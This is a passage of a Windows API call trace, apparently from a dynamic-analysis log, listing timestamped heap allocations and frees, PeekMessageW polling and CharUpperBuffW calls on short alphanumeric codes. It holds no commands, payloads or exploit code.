(HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0188.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0188.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2058 [0188.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0188.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0188.744] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0188.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b16b8 [0188.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0188.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0188.744] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0188.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9678 [0188.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0188.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0188.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0188.744] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0188.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0188.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0188.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0188.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xad35) returned 0x24dd4d0 [0188.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0188.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0188.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0188.744] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0188.745] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0188.745] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0188.745] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0188.745] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0188.745] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0188.745] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0188.745] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c68 [0188.745] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0188.745] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0188.745] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0188.745] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0188.745] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0188.745] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0188.745] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0188.745] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0188.745] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.745] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0188.745] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0188.745] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0188.745] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0188.745] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0188.745] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0188.746] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0188.746] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0188.746] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0188.746] CharUpperBuffW (in: lpsz="SSA6000504F44", cchLength=0xd | out: lpsz="SSA6000504F44") returned 0xd [0188.746] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0188.746] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0188.746] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0188.746] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0188.746] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0188.746] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0188.746] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0188.746] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0188.746] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.746] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0188.746] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.746] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0188.746] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0188.746] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0188.747] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0188.747] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0188.747] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0188.747] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0188.747] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0188.747] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0188.747] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0188.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0188.747] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0188.747] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0188.747] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0188.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0188.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0188.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0188.747] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.747] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0188.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0188.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0188.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0188.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0188.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0188.748] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0188.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0188.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0188.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0188.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0188.748] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0188.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0188.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0188.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0188.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0188.748] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0188.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0188.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0188.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0188.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0188.749] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.749] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0188.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0188.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0188.749] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0188.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0188.749] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0188.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0188.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0188.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0188.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0188.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0188.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0188.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0188.749] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0188.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0188.749] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0188.749] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0188.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0188.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0188.750] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0188.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0188.750] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0188.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0188.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0188.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0188.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0188.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0188.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0188.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0188.750] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0188.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0188.750] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0188.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0188.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0188.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0188.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0188.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0188.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0188.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0188.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0188.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0188.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0188.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0188.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0188.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0188.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0188.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0188.751] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0188.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0188.751] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0188.751] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0188.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0188.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0188.751] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0188.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0188.751] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0188.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0188.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0188.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0188.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0188.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0188.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0188.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0188.752] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0188.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0188.752] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0188.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0188.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0188.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0188.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0188.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0188.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0188.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0188.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0188.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0188.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0188.752] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0188.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0188.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0188.752] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0188.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0188.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0188.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0188.753] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.753] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0188.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0188.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0188.753] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0188.753] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.753] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0188.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0188.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0188.753] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0188.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0188.753] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0188.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0188.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0188.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0188.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0188.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0188.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0188.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0188.754] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0188.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0188.754] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0188.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0188.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0188.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0188.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0188.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: 